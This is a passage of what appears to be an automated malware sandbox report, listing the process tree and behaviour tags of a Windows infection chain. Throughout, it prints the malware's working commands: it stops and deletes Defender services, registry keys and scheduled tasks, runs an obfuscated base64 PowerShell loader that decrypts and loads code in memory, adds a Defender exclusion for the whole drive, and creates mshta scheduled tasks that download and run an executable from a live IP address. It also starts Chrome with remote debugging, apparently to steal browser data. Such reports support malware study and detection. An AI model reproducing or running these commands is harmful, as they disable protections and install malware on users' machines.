        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        11⤵
        
        PID:5168
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:5160
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        11⤵
        Launches sc.exe
        
        PID:3936
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        11⤵
        
        PID:412
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3136
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        11⤵
        Launches sc.exe
        
        PID:3112
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        11⤵
        
        PID:5200
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:2088
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        11⤵
        Launches sc.exe
        
        PID:1244
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        11⤵
        
        PID:4416
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:4972
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        11⤵
        Launches sc.exe
        
        PID:2996
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        11⤵
        
        PID:1576
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:2716
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        11⤵
        Launches sc.exe
        
        PID:3864
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        11⤵
        
        PID:60
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:1292
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        11⤵
        Launches sc.exe
        
        PID:3896
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        11⤵
        
        PID:1404
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:5888
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        11⤵
        Launches sc.exe
        
        PID:4080
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        11⤵
        
        PID:1652
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:1556
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        11⤵
        Launches sc.exe
        
        PID:3684
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        11⤵
        
        PID:464
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        11⤵
        
        PID:5740
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        11⤵
        
        PID:3280
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        11⤵
        
        PID:1952
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        11⤵
        
        PID:5908
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        11⤵
        Launches sc.exe
        
        PID:4436
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        11⤵
        Launches sc.exe
        
        PID:3472
      - C:\Windows\SysWOW64\cmd.exe
        
        "C:\Windows\System32\cmd.exe" /C "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:5780
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /K "C:\Users\Admin\AppData\Local\Temp\10369541121\8BNn7ce.cmd"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:5776
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noprofile -windowstyle hidden -ep bypass -Command "[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('DQoNCiR2bWVhcnAgPSBAJw0KJHVzZXJ4Z3dOYW1lIHhndz0gJGVueGd3djpVU0V4Z3dSTkFNRXhndzskdGlzeGd3ID0gIkN4Z3c6XFVzZXhnd3JzXCR1eGd3c2VyTmF4Z3dtZVxkd3hnd20uYmF0eGd3IjtpZiB4Z3coVGVzdHhndy1QYXRoeGd3ICR0aXN4Z3cpIHsgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiQnhnd2F0Y2ggeGd3ZmlsZSB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dDeWFuO3hndyAgICAkeGd3ZmlsZUx4Z3dpbmVzIHhndz0gW1N5eGd3c3RlbS54Z3dJTy5GaXhnd2xlXTo6eGd3UmVhZEF4Z3dsbExpbnhnd2VzKCR0eGd3aXMsIFt4Z3dTeXN0ZXhnd20uVGV4eGd3dC5FbmN4Z3dvZGluZ3hnd106OlVUeGd3RjgpOyB4Z3cgICBmb3hnd3JlYWNoeGd3ICgkbGl4Z3duZSBpbnhndyAkZmlseGd3ZUxpbmV4Z3dzKSB7IHhndyAgICAgeGd3ICBpZiB4Z3coJGxpbnhnd2UgLW1heGd3dGNoICd4Z3deOjo6IHhndz8oLispeGd3JCcpIHt4Z3cgICAgIHhndyAgICAgeGd3ICBXcml4Z3d0ZS1Ib3hnd3N0ICJJeGd3bmplY3R4Z3dpb24gY3hnd29kZSBkeGd3ZXRlY3R4Z3dlZCBpbnhndyB0aGUgeGd3YmF0Y2h4Z3cgZmlsZXhndy4iIC1GeGd3b3JlZ3J4Z3dvdW5kQ3hnd29sb3IgeGd3Q3lhbjt4Z3cgICAgIHhndyAgICAgeGd3ICB0cnl4Z3cgeyAgIHhndyAgICAgeGd3ICAgICB4Z3cgICAkZHhnd2Vjb2RleGd3ZEJ5dGV4Z3dzID0gW3hnd1N5c3RleGd3bS5Db254Z3d2ZXJ0XXhndzo6RnJveGd3bUJhc2V4Z3c2NFN0cnhnd2luZygkeGd3bWF0Y2h4Z3dlc1sxXXhndy5UcmlteGd3KCkpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3ckaW5qZXhnd2N0aW9ueGd3Q29kZSB4Z3c9IFtTeXhnd3N0ZW0ueGd3VGV4dC54Z3dFbmNvZHhnd2luZ106eGd3OlVuaWN4Z3dvZGUuR3hnd2V0U3RyeGd3aW5nKCR4Z3dkZWNvZHhnd2VkQnl0eGd3ZXMpOyB4Z3cgICAgIHhndyAgICAgeGd3ICAgICB4Z3dXcml0ZXhndy1Ib3N0eGd3ICJJbmp4Z3dlY3Rpb3hnd24gY29keGd3ZSBkZWN4Z3dvZGVkIHhnd3N1Y2NleGd3c3NmdWx4Z3dseS4iIHhndy1Gb3JleGd3Z3JvdW54Z3dkQ29sb3hnd3IgR3JleGd3ZW47ICB4Z3cgICAgIHhndyAgICAgeGd3ICAgIFd4Z3dyaXRlLXhnd0hvc3QgeGd3IkV4ZWN4Z3d1dGluZ3hndyBpbmpleGd3Y3Rpb254Z3cgY29kZXhndy4uLiIgeGd3LUZvcmV4Z3dncm91bnhnd2RDb2xveGd3ciBZZWx4Z3dsb3c7IHhndyAgICAgeGd3ICAgICB4Z3cgICAgIHhnd0ludm9reGd3ZS1FeHB4Z3dyZXNzaXhnd29uICRpeGd3bmplY3R4Z3dpb25Db3hnd2RlOyAgeGd3ICAgICB4Z3cgICAgIHhndyAgICBieGd3cmVhazt4Z3cgICAgIHhndyAgICAgeGd3ICB9IGN4Z3dhdGNoIHhnd3sgICAgeGd3ICAgICB4Z3cgICAgIHhndyAgV3JpeGd3dGUtSG94Z3dzdCAiRXhnd3Jyb3IgeGd3ZHVyaW54Z3dnIGRlY3hnd29kaW5neGd3IG9yIGV4Z3d4ZWN1dHhnd2luZyBpeGd3bmplY3R4Z3dpb24gY3hnd29kZTogeGd3JF8iIC14Z3dGb3JlZ3hnd3JvdW5keGd3Q29sb3J4Z3cgUmVkO3hndyAgICAgeGd3ICAgICB4Z3cgIH07IHhndyAgICAgeGd3ICB9OyB4Z3cgICB9O3hnd30gZWxzeGd3ZSB7ICB4Z3cgICAgV3hnd3JpdGUteGd3SG9zdCB4Z3ciU3lzdHhnd2VtIEVyeGd3cm9yOiB4Z3dCYXRjaHhndyBmaWxleGd3IG5vdCB4Z3dmb3VuZHhndzogJHRpeGd3cyIgLUZ4Z3dvcmVncnhnd291bmRDeGd3b2xvciB4Z3dSZWQ7IHhndyAgIGV4eGd3aXQ7fTt4Z3dmdW5jdHhnd2lvbiBweGd3c29nbCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGF4Z3dlc192YXhnd3I9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQWVzeGd3XTo6Q3J4Z3dlYXRlKHhndyk7CSRheGd3ZXNfdmF4Z3dyLk1vZHhnd2U9W1N5eGd3c3RlbS54Z3dTZWN1cnhnd2l0eS5DeGd3cnlwdG94Z3dncmFwaHhnd3kuQ2lweGd3aGVyTW94Z3dkZV06Onhnd0NCQzsJeGd3JGFlc194Z3d2YXIuUHhnd2FkZGlueGd3Zz1bU3l4Z3dzdGVtLnhnd1NlY3VyeGd3aXR5LkN4Z3dyeXB0b3hnd2dyYXBoeGd3eS5QYWR4Z3dkaW5nTXhnd29kZV06eGd3OlBLQ1N4Z3c3OwkkYXhnd2VzX3ZheGd3ci5LZXl4Z3c9W1N5c3hnd3RlbS5DeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygnVUNEeGd3ZFZ6U3Z4Z3dDMUNvOXhnd1VWb1B1eGd3RXRvVWR4Z3duNzZsQ3hndytPV0tJeGd3OG5qRGV4Z3dxTDZ4MHhndz0nKTsJeGd3JGFlc194Z3d2YXIuSXhnd1Y9W1N5eGd3c3RlbS54Z3dDb252ZXhnd3J0XTo6eGd3RnJvbUJ4Z3dhc2U2NHhnd1N0cmlueGd3ZygnK2F4Z3cvRHp3NHhnd1ZRR1g3eGd3L1J0Y0h4Z3dQQkpWd3hndz09Jyk7eGd3CSRkZWN4Z3dyeXB0b3hnd3JfdmFyeGd3PSRhZXN4Z3dfdmFyLnhnd0NyZWF0eGd3ZURlY3J4Z3d5cHRvcnhndygpOwkkeGd3cmV0dXJ4Z3duX3Zhcnhndz0kZGVjeGd3cnlwdG94Z3dyX3Zhcnhndy5UcmFueGd3c2Zvcm14Z3dGaW5hbHhnd0Jsb2NreGd3KCRwYXJ4Z3dhbV92YXhnd3IsIDAseGd3ICRwYXJ4Z3dhbV92YXhnd3IuTGVueGd3Z3RoKTt4Z3cJJGRlY3hnd3J5cHRveGd3cl92YXJ4Z3cuRGlzcHhnd29zZSgpeGd3OwkkYWV4Z3dzX3Zhcnhndy5EaXNweGd3b3NlKCl4Z3c7CSRyZXhnd3R1cm5feGd3dmFyO314Z3dmdW5jdHhnd2lvbiBzeGd3dGF4cCh4Z3ckcGFyYXhnd21fdmFyeGd3KXsJJGh4Z3dwaGM9Tnhnd2V3LU9ieGd3amVjdCB4Z3dTeXN0ZXhnd20uSU8ueGd3TWVtb3J4Z3d5U3RyZXhnd2FtKCwkeGd3cGFyYW14Z3dfdmFyKXhndzsJJGlzeGd3d2hiPU54Z3dldy1PYnhnd2plY3QgeGd3U3lzdGV4Z3dtLklPLnhnd01lbW9yeGd3eVN0cmV4Z3dhbTsJJHhnd2Zsc2l6eGd3PU5ldy14Z3dPYmplY3hnd3QgU3lzeGd3dGVtLkl4Z3dPLkNvbXhnd3ByZXNzeGd3aW9uLkd4Z3daaXBTdHhnd3JlYW0oeGd3JGhwaGN4Z3csIFtJT3hndy5Db21weGd3cmVzc2l4Z3dvbi5Db3hnd21wcmVzeGd3c2lvbk14Z3dvZGVdOnhndzpEZWNveGd3bXByZXN4Z3dzKTsJJHhnd2Zsc2l6eGd3LkNvcHl4Z3dUbygkaXhnd3N3aGIpeGd3OwkkZmx4Z3dzaXouRHhnd2lzcG9zeGd3ZSgpOwl4Z3ckaHBoY3hndy5EaXNweGd3b3NlKCl4Z3c7CSRpc3hnd3doYi5EeGd3aXNwb3N4Z3dlKCk7CXhndyRpc3doeGd3Yi5Ub0F4Z3dycmF5KHhndyk7fWZ1eGd3bmN0aW94Z3duIGhlenhnd2d4KCRweGd3YXJhbV94Z3d2YXIsJHhnd3BhcmFteGd3Ml92YXJ4Z3cpewkkbnhnd3g9W1N5eGd3c3RlbS54Z3dSZWZsZXhnd2N0aW9ueGd3LkFzc2V4Z3dtYmx5XXhndzo6KCdkeGd3YW9MJ1t4Z3ctMS4uLXhndzRdIC1qeGd3b2luICd4Z3cnKShbYnhnd3l0ZVtdeGd3XSRwYXJ4Z3dhbV92YXhnd3IpOwkkeGd3bGF6PSR4Z3dueC5Fbnhnd3RyeVBveGd3aW50Owl4Z3ckbGF6Lnhnd0ludm9reGd3ZSgkbnV4Z3dsbCwgJHhnd3BhcmFteGd3Ml92YXJ4Z3cpO30kaHhnd29zdC5VeGd3SS5SYXd4Z3dVSS5XaXhnd25kb3dUeGd3aXRsZSB4Z3c9ICR0aXhnd3M7JGxveGd3Zj1bU3l4Z3dzdGVtLnhnd0lPLkZpeGd3bGVdOjp4Z3coJ3R4ZXhnd1RsbEFkeGd3YWVSJ1t4Z3ctMS4uLXhndzExXSAteGd3am9pbiB4Z3cnJykoJHhnd3RpcykueGd3U3BsaXR4Z3coW0Vudnhnd2lyb25teGd3ZW50XTp4Z3c6TmV3THhnd2luZSk7eGd3Zm9yZWF4Z3djaCAoJHhnd3pwamxweGd3IGluICR4Z3dsb2YpIHhnd3sJaWYgeGd3KCR6cGp4Z3dscC5TdHhnd2FydHNXeGd3aXRoKCd4Z3c6OiAnKXhndykJewkJeGd3JGdxYnN4Z3c9JHpwanhnd2xwLlN1eGd3YnN0cml4Z3duZygzKXhndzsJCWJyeGd3ZWFrOwl4Z3d9fSRpdXhnd3A9W3N0eGd3cmluZ1t4Z3ddXSRncXhnd2JzLlNweGd3bGl0KCd4Z3dcJyk7JHhnd25sdD1zeGd3dGF4cCB4Z3cocHNvZ3hnd2wgKFtDeGd3b252ZXJ4Z3d0XTo6Rnhnd3JvbUJheGd3c2U2NFN4Z3d0cmluZ3hndygkaXVweGd3WzBdKSl4Z3cpOyRqZXhnd2J0PXN0eGd3YXhwICh4Z3dwc29nbHhndyAoW0NveGd3bnZlcnR4Z3ddOjpGcnhnd29tQmFzeGd3ZTY0U3R4Z3dyaW5nKHhndyRpdXBbeGd3MV0pKSl4Z3c7aGV6Z3hnd3ggJG5seGd3dCAkbnV4Z3dsbDtoZXhnd3pneCAkeGd3amVidCB4Z3coLFtzdHhnd3JpbmdbeGd3XV0gKCd4Z3clKicpKXhndzsNCidADQoNCiRybGpmcnAgPSAkdm1lYXJwIC1yZXBsYWNlICd4Z3cnLCAnJw0KDQpJbnZva2UtRXhwcmVzc2lvbiAkcmxqZnJwDQo=')) | Invoke-Expression"
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops startup file
        System Location Discovery: System Language Discovery
        Suspicious behavior: AddClipboardFormatListener
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4648
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath 'C:\'
        9⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4620
        
        C:\Users\Admin\AppData\Local\Temp\IuCRo0KwDZS2.exe
        
        "C:\Users\Admin\AppData\Local\Temp\IuCRo0KwDZS2.exe"
        9⤵
        
        PID:17928
      - C:\Users\Admin\AppData\Local\Temp\10369870101\e214b0379a.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369870101\e214b0379a.exe"
        6⤵
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        
        PID:1680
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c schtasks /create /tn lnwcPmaKYGY /tr "mshta C:\Users\Admin\AppData\Local\Temp\IFCVF05tj.hta" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:1064
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn lnwcPmaKYGY /tr "mshta C:\Users\Admin\AppData\Local\Temp\IFCVF05tj.hta" /sc minute /mo 25 /ru "Admin" /f
        8⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5860
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta C:\Users\Admin\AppData\Local\Temp\IFCVF05tj.hta
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:1920
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'U55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3336
        
        C:\Users\Admin\AppData\Local\TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE
        
        "C:\Users\Admin\AppData\Local\TempU55FUKMISSSRBDYIGR5YVIYEYRZ1JSTN.EXE"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:1224
      - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10369880121\am_no.cmd" "
        6⤵
        System Location Discovery: System Language Discovery
        
        PID:3624
        
        C:\Windows\SysWOW64\timeout.exe
        
        timeout /t 2
        7⤵
        System Location Discovery: System Language Discovery
        Delays execution with timeout.exe
        
        PID:2500
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:3888
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3928
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:60
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:3468
        
        C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        7⤵
        System Location Discovery: System Language Discovery
        
        PID:4072
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"
        8⤵
        Command and Scripting Interpreter: PowerShell
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1988
        
        C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn "C1xj5mazDuO" /tr "mshta \"C:\Temp\G8DAFiuhw.hta\"" /sc minute /mo 25 /ru "Admin" /f
        7⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:1104
        
        C:\Windows\SysWOW64\mshta.exe
        
        mshta "C:\Temp\G8DAFiuhw.hta"
        7⤵
        Checks computer location settings
        System Location Discovery: System Language Discovery
        
        PID:5820
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;
        8⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Downloads MZ/PE file
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:1684
        
        C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe
        
        "C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"
        9⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Identifies Wine through registry keys
        Suspicious use of NtSetInformationThreadHideFromDebugger
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4112
      - C:\Users\Admin\AppData\Local\Temp\10369910101\6lV7WRt.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10369910101\6lV7WRt.exe"
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:2296
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        7⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4676
      - C:\Users\Admin\AppData\Local\Temp\10370040101\amnew.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10370040101\amnew.exe"
        6⤵
        Checks computer location settings
        Executes dropped EXE
        Drops file in Windows directory
        System Location Discovery: System Language Discovery
        
        PID:1040
        
        C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe
        
        "C:\Users\Admin\AppData\Local\Temp\97419fb2c0\futors.exe"
        7⤵
        Downloads MZ/PE file
        Checks computer location settings
        Executes dropped EXE
        Adds Run key to start application
        System Location Discovery: System Language Discovery
        
        PID:888
        
        C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10001960101\gron12321.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4784
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        
        PID:4712
        
        C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe
        
        "C:\Users\Admin\AppData\Local\Temp\10026630101\v7942.exe"
        8⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4564
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"
        9⤵
        System Location Discovery: System Language Discovery
        Checks processor information in registry
        Suspicious behavior: EnumeratesProcesses
        
        PID:4612
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default"
        10⤵
        Uses browser remote debugging
        Checks processor information in registry
        Enumerates system info in registry
        Modifies data under HKEY_USERS
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of FindShellTrayWindow
        
        PID:4320
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7fffd8c5dcf8,0x7fffd8c5dd04,0x7fffd8c5dd10
        11⤵
        
        PID:6120
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=1984,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=1980 /prefetch:2
        11⤵
        
        PID:4304
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=2160,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2192 /prefetch:3
        11⤵
        
        PID:2608
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2352,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=2364 /prefetch:8
        11⤵
        
        PID:6044
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3228,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3232 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:3988
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3252,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=3288 /prefetch:1
        11⤵
        Uses browser remote debugging
        
        PID:1996
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4276,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4300 /prefetch:2
        11⤵
        Uses browser remote debugging
        
        PID:212
        
        C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9223 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4592,i,2473504648285179494,2983946710236824268,262144 --variations-seed-version=20250313-182214.581000 --mojo-platform-channel-handle=4656 /prefetch:1
        11⤵
